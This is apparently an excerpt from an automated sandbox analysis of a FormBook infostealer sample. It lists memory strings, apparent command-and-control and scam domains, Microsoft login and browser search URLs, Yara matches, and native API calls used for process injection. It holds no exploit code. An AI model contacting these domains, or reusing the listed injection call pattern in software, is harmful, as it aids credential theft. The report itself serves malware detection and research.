                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:27:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eK4381bU4f0y4%2Fst3HTiPCypINiMaFLufdi26j7X%2BqaOtEelLjufxFb%2F0hl4pXkq8j1FZJLBQa6uc%2FMOoOQjkvEYTVzsCUyddZ6DRN1HqwMn6i9c4CXihJN%2Bc7YOL7xR2fCHT%2B0anvVt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9001cfd23f1d1875-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1519&rtt_var=759&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTq
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Alesis_DM10.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Camas.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4kDJLB
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/DAT_to_MP3.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/EMI.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2FtC4kDJLB%2
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/The_Associates.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBf6ZgVAv6k%2
                Source: ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=1
                Source: ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=2
                Source: ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=MWlFQ2d5amYxYkhvc2pKQXl3UXEzUFhuMVFMYXlyY3I5aGZUSVNHc
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Guacamask.online
                Source: ikSQhwOmrrnfH.exe, 0000000A.00000002.4016477333.00000000051AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aziziyeescortg.xyz
                Source: ikSQhwOmrrnfH.exe, 0000000A.00000002.4016477333.00000000051AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.aziziyeescortg.xyz/2pcx/
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/__media__/design/underconstructionnotice.php?d=guacamask.online
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4017796318.0000000007DB0000.00000004.00000800.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/__media__/js/trademark.php?d=guacamask.online&type=ns
                Source: ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ieUnatt.exe, 00000008.00000002.4015602502.00000000065E4000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003D94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000311B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ieUnatt.exe, 00000008.00000003.2678377996.00000000080E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000311B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000313E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.Gj
                Source: ieUnatt.exe, 00000008.00000002.4012150420.000000000311B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ieUnatt.exe, 00000008.00000002.4015602502.0000000005C78000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilyijy.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4015602502.0000000005C78000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilylso.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4015602502.0000000005C78000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4015602502.0000000005C78000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://moneyeasilyywe.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ieUnatt.exe, 00000008.00000003.2684610588.0000000008108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003428000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kkpmoneysocial.top
                Source: ieUnatt.exe, 00000008.00000002.4015602502.0000000005AE6000.00000004.10000000.00040000.00000000.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4014055579.0000000003296000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2505138823.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4013556321.0000000002840000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_0042CCB3 NtClose,6_2_0042CCB3
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772B60 NtClose,LdrInitializeThunk,6_2_01772B60
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01772DF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01772C70
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017735C0 NtCreateMutant,LdrInitializeThunk,6_2_017735C0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01774340 NtSetContextThread,6_2_01774340
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01774650 NtSuspendThread,6_2_01774650
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772BF0 NtAllocateVirtualMemory,6_2_01772BF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772BE0 NtQueryValueKey,6_2_01772BE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772BA0 NtEnumerateValueKey,6_2_01772BA0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772B80 NtQueryInformationFile,6_2_01772B80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772AF0 NtWriteFile,6_2_01772AF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772AD0 NtReadFile,6_2_01772AD0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772AB0 NtWaitForSingleObject,6_2_01772AB0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772D30 NtUnmapViewOfSection,6_2_01772D30
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772D10 NtMapViewOfSection,6_2_01772D10
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772D00 NtSetInformationFile,6_2_01772D00
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772DD0 NtDelayExecution,6_2_01772DD0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772DB0 NtEnumerateKey,6_2_01772DB0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772C60 NtCreateKey,6_2_01772C60
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772C00 NtQueryInformationProcess,6_2_01772C00
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772CF0 NtOpenProcess,6_2_01772CF0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772CC0 NtQueryVirtualMemory,6_2_01772CC0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772CA0 NtQueryInformationToken,6_2_01772CA0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772F60 NtCreateProcessEx,6_2_01772F60
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772F30 NtCreateSection,6_2_01772F30
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772FE0 NtCreateFile,6_2_01772FE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772FB0 NtResumeThread,6_2_01772FB0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772FA0 NtQuerySection,6_2_01772FA0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772F90 NtProtectVirtualMemory,6_2_01772F90
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772E30 NtWriteVirtualMemory,6_2_01772E30
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772EE0 NtQueueApcThread,6_2_01772EE0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772EA0 NtAdjustPrivilegesToken,6_2_01772EA0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01772E80 NtReadVirtualMemory,6_2_01772E80
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01773010 NtOpenDirectoryObject,6_2_01773010
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01773090 NtSetValueKey,6_2_01773090
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_017739B0 NtGetContextThread,6_2_017739B0
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01773D70 NtOpenThread,6_2_01773D70
                Source: C:\Users\user\Desktop\BalphRTkPS.exeCode function: 6_2_01773D10 NtOpenProcessToken,6_2_01773D10
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC4650 NtSuspendThread,LdrInitializeThunk,8_2_04EC4650
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC4340 NtSetContextThread,LdrInitializeThunk,8_2_04EC4340
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04EC2CA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2C60 NtCreateKey,LdrInitializeThunk,8_2_04EC2C60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04EC2C70
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04EC2DF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2DD0 NtDelayExecution,LdrInitializeThunk,8_2_04EC2DD0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_04EC2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_04EC2D30
